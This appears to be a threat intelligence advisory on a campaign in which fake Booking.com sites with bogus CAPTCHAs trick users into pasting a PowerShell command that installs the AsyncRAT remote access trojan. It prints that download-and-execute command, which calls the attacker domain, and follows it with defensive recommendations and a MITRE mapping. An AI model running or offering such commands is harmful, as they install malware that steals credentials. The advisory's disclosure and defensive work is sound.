A recent malware campaign uncovered by Malwarebytes involves users being redirected from gaming platforms and social media to fake Booking.com clones, ultimately leading to infection with AsyncRAT – a potent Remote Access Trojan. These malicious redirection links are embedded in ads and deceptive CAPTCHA forms, exploiting user trust to trick victims into executing PowerShell commands that download and install the malware.
Severity Level: High
Threat Details
1. Attack Vector:
- Victims are lured through sponsored ads, gaming sites, and social media posts.
- Redirected to fake Booking[.]com clones.
- Presented with a CAPTCHA prompt.
- Clicking the CAPTCHA causes a malicious PowerShell command to be copied to the clipboard.
- Instructions prompt victims to paste the command into the Windows Run dialog, triggering malware installation.
2. Payload Execution:
powershell -NoProfile -WindowStyle Hidden -Command “$banp = ‘bkngnet[.]com’; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv”
This downloads ckjg.exe, which installs Stub.exe
3. Malware Functionality – AsyncRAT:
- Remote desktop and keylogging
- Credential theft
- File execution and exfiltration
- Persistence and evasion
Recommendations:
- Use an active anti-malware solution that blocks malicious websites and scripts.
- Use a browser extension that blocks malicious domains and scams.
- Disable JavaScript by default in untrusted contexts to prevent clipboard hijacks via document.execCommand(‘copy’).
- Enforce policies via Group Policy to disable or restrict powershell.exe and pwsh.exe for standard users.
- Educate users on:
- Recognizing fake CAPTCHA prompts that ask for system-level actions.
- The risks of copying/pasting commands from unknown websites.
- Red flags in travel booking scenarios (e.g., unusual domains, poor design, unexpected redirects).
- Use application allowlisting (e.g., Microsoft AppLocker or WDAC) to prevent execution of unauthorized EXEs like Stub.exe.
- Restrict access to the Windows Run dialog for standard users.
- Enable detailed PowerShell logging (Event ID 4104) and monitor for: use of Invoke-RestMethod, Invoke-Expression, or obfuscated strings.
- Block the IOCs at their respective controls
https://www.virustotal.com/gui/collection/6ffdf218e2d97b362919744b90ab6651a2029969ace685585774616cf452a3ee/iocs
MITRE ATT&CK
| Tactic | Technique | ID |
| Initial Access | Drive-by Compromise | T1189 |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Execution | User Execution: Malicious Link | T1204.001 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Defense Evasion | Masquerading | T1036 |
| Command and Control (C2) | Application Layer Protocol: Web Protocols | T1071.001 |
| Command and Control (C2) | Remote Access Software | T1219 |
| Credential Access | Input Capture: Keylogging | T1056.001 |
| Collection | Clipboard Data | T1115 |
Source:
- https://www.malwarebytes.com/blog/news/2025/06/victims-risk-asyncrat-infection-after-being-redirected-to-fake-booking-sites
Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn
No related posts found.